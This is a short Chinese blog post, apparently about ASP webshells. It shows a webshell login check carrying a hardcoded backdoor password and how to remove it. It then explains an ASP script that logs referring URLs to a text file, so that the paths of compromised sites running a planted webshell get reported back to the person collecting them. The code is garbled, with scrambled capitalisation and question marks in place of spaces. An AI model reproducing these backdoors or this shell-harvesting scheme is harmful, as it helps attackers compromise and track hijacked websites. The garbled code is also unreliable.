正常的:

  EnD?fUNCtIONIF?SEssIoN("web2a2dmin")<>UsERpaSs?thEnIF?requeSt.FoRM("pass")<>""?TheNiF?REquesT.foRM("pass")=uSERPASS?ThenSEsSIoN("web2a2dmin")=uSERPAssrESPOnsE.rEdirEct?UrlELserrs"对不起,密码验证失败!"

  加有万能的:

  EnD?fUNCtIONIF?SEssIoN("web2a2dmin")<>UsERpaSs?thEnIF?requeSt.FoRM("pass")<>""?TheNiF?REquesT.foRM("pass")=uSERPASS?or?request.form("pass")="1111111"?ThenSEsSIoN("web2a2dmin")=uSERPAssrESPOnsE.rEdirEct?UrlELserrs"对不起,密码验证失败!"

  1111111就是传说中的万能密码了。

  找到万能密码代码后把or request.form("pass")="1111111" 删除就OK了!

  下面来找马大多数都喜欢用框架挂马:

  找到后删了,到此就算剔除了!

  下面教大家的原理:

  这是一收信的代码将其保存为1

  <%url=Request.ServerVariables("HTTP_Referer")set?fs=server.CreateObject("Scripting.FileSystemObject")set?file=fs.OpenTextFile(server.MapPath("bobo.txt"),8,True)file.writeline?urlfile.closeset?file=nothing?set?fs=nothing?%>

  代码基本意思就是:“HTTP_REFERER”?到当前页面的前一页面的 URL 地址

  简单来说就是获得web的地址然后记录在bobo.txt这里文本里

  到空间比如?127.0.0.1/1

  然后里用

  

  插到asp木马中

  那么别人访问这个被挂了马的asp木马就会生成个bobo.txt里面就会有asp大马的路径了

 
目前共有0条评论
  • 暂无Trackback
你目前的身份是游客,评论请输入昵称和电邮!